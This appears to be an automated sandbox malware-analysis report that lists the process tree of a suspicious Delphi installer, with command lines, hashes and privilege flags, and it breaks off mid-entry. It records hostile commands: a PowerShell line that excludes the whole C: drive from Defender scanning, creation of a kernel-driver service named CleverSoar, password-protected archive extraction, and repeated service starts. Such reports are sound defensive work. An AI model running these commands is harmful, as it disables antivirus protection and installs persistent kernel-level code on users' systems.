                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:01:52:20
                                            Start date:25/12/2024
                                            Path:C:\Users\user\Desktop\yvaKqhmD4L.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\yvaKqhmD4L.exe"
                                            Imagebase:0xd0000
                                            File size:6'745'048 bytes
                                            MD5 hash:17AE5643E60881D69E3E25122CA1FC67
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:01:52:21
                                            Start date:25/12/2024
                                            Path:C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe"
                                            Imagebase:0xb10000
                                            File size:3'366'912 bytes
                                            MD5 hash:6AD6576147BC6B91DD40240772510F4F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Antivirus matches:
                                            • Detection: 2%, Virustotal, Browse
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:01:52:21
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                            Imagebase:0x7ff788560000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:01:52:21
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:01:52:25
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff7699e0000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:5
                                            Start time:01:52:29
                                            Start date:25/12/2024
                                            Path:C:\Users\user\Desktop\yvaKqhmD4L.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
                                            Imagebase:0xd0000
                                            File size:6'745'048 bytes
                                            MD5 hash:17AE5643E60881D69E3E25122CA1FC67
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:6
                                            Start time:01:52:30
                                            Start date:25/12/2024
                                            Path:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp" /SL5="$A022E,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
                                            Imagebase:0x7e0000
                                            File size:3'366'912 bytes
                                            MD5 hash:6AD6576147BC6B91DD40240772510F4F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:01:52:31
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:01:52:31
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:01:52:32
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:01:52:32
                                            Start date:25/12/2024
                                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                            Wow64 process (32bit):true
                                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                            Imagebase:0xcf0000
                                            File size:831'200 bytes
                                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            • Detection: 0%, Virustotal, Browse
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:01:52:32
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:01:52:32
                                            Start date:25/12/2024
                                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                            Wow64 process (32bit):true
                                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                            Imagebase:0xcf0000
                                            File size:831'200 bytes
                                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:01:52:32
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:15
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:16
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:17
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:18
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:19
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:20
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:21
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:22
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:23
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:24
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:25
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:26
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:27
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:28
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:29
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:30
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:31
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:32
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:33
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:34
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:35
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:36
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:37
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:38
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:39
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:40
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:41
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:42
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:43
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:44
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:45
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:46
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:47
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:48
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:49
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:50
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:51
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:52
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:53
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:54
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:55
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:56
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:57
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:58
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:59
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:60
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:61
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
